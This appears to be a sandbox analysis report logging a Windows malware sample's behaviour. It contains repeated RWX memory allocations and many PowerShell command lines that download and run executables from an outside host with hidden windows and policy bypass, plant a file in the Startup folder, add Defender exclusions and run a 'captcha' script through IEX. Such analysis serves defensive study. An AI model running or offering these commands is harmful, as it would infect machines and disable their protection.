NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02423000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02424000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02497000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02482000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02495000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02425000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0248c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02426000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02483000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02484000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02485000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02488000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02489000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027de000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027df000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (19 events)

cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/clp.ps1' -OutFile 'C:\Users\test22\clp.ps1'; Start-Process -FilePath 'powershell.exe' -ArgumentList '-NoProfile', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-File', 'C:\Users\test22\clp.ps1' -WindowStyle Hidden
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\test22\clp.ps1
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/clp.ps1' -OutFile 'C:\Users\test22\clp.ps1'; Start-Process -FilePath 'powershell.exe' -ArgumentList '-NoProfile', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-File', 'C:\Users\test22\clp.ps1' -WindowStyle Hidden
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/GwKVGTzF/TGC.exe' -OutFile 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'; Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/xc.exe' -OutFile 'C:\Users\test22\XClient.exe'; Start-Process -FilePath 'C:\Users\test22\XClient.exe'
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\test22\qdll.exe'; Start-Process -FilePath 'C:\Users\test22\qdll.exe'
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGS.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/cs.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/cs.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGR.exe' -OutFile 'C:\Users\test22\TGR.exe'; Start-Process -FilePath 'C:\Users\test22\TGR.exe'
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGS.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-MpPreference -ExclusionPath 'C:\Users\test22'; Add-MpPreference -ExclusionPath 'C:/Windows'
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGR.exe' -OutFile 'C:\Users\test22\TGR.exe'; Start-Process -FilePath 'C:\Users\test22\TGR.exe'
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/GwKVGTzF/TGC.exe' -OutFile 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'; Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-MpPreference -ExclusionPath 'C:\Users\test22'; Add-MpPreference -ExclusionPath 'C:/Windows'
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/xc.exe' -OutFile 'C:\Users\test22\XClient.exe'; Start-Process -FilePath 'C:\Users\test22\XClient.exe'
cmdline	powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\test22\AppData\Local\Temp\captcha.cmd'))"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\test22\qdll.exe'; Start-Process -FilePath 'C:\Users\test22\qdll.exe'
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\test22\clp.ps1

A process created a hidden window (16 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 29, 2024, 5:08 p.m.	thread_identifier: 2400 thread_handle: 0x00000538 process_identifier: 2396 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\test22\qdll.exe'; Start-Process -FilePath 'C:\Users\test22\qdll.exe' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000054c	1	1
ShellExecuteExW Oct. 29, 2024, 5:08 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\test22\qdll.exe'; Start-Process -FilePath 'C:\Users\test22\qdll.exe' filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1
CreateProcessInternalW Oct. 29, 2024, 5:08 p.m.	thread_identifier: 2448 thread_handle: 0x00000548 process_identifier: 2444 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/xc.exe' -OutFile 'C:\Users\test22\XClient.exe'; Start-Process -FilePath 'C:\Users\test22\XClient.exe' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000564	1	1
ShellExecuteExW Oct. 29, 2024, 5:08 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/xc.exe' -OutFile 'C:\Users\test22\XClient.exe'; Start-Process -FilePath 'C:\Users\test22\XClient.exe' filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1
CreateProcessInternalW Oct. 29, 2024, 5:08 p.m.	thread_identifier: 2508 thread_handle: 0x00000560 process_identifier: 2504 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/GwKVGTzF/TGC.exe' -OutFile 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'; Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000057c	1	1
ShellExecuteExW Oct. 29, 2024, 5:08 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/GwKVGTzF/TGC.exe' -OutFile 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'; Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe' filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1
CreateProcessInternalW Oct. 29, 2024, 5:08 p.m.	thread_identifier: 2568 thread_handle: 0x00000578 process_identifier: 2564 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGR.exe' -OutFile 'C:\Users\test22\TGR.exe'; Start-Process -FilePath 'C:\Users\test22\TGR.exe' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000594	1	1
ShellExecuteExW Oct. 29, 2024, 5:08 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGR.exe' -OutFile 'C:\Users\test22\TGR.exe'; Start-Process -FilePath 'C:\Users\test22\TGR.exe' filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1
CreateProcessInternalW Oct. 29, 2024, 5:08 p.m.	thread_identifier: 2644 thread_handle: 0x00000590 process_identifier: 2640 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGS.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000005ac	1	1
ShellExecuteExW Oct. 29, 2024, 5:08 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGS.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe' filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1
CreateProcessInternalW Oct. 29, 2024, 5:08 p.m.	thread_identifier: 2740 thread_handle: 0x000005a8 process_identifier: 2736 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/clp.ps1' -OutFile 'C:\Users\test22\clp.ps1'; Start-Process -FilePath 'powershell.exe' -ArgumentList '-NoProfile', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-File', 'C:\Users\test22\clp.ps1' -WindowStyle Hidden filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000005c4	1	1
ShellExecuteExW Oct. 29, 2024, 5:08 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/clp.ps1' -OutFile 'C:\Users\test22\clp.ps1'; Start-Process -FilePath 'powershell.exe' -ArgumentList '-NoProfile', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-File', 'C:\Users\test22\clp.ps1' -WindowStyle Hidden filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1
CreateProcessInternalW Oct. 29, 2024, 5:08 p.m.	thread_identifier: 2892 thread_handle: 0x000005c0 process_identifier: 2888 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/cs.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe' filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000005dc	1	1
ShellExecuteExW Oct. 29, 2024, 5:08 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/cs.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe' filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1
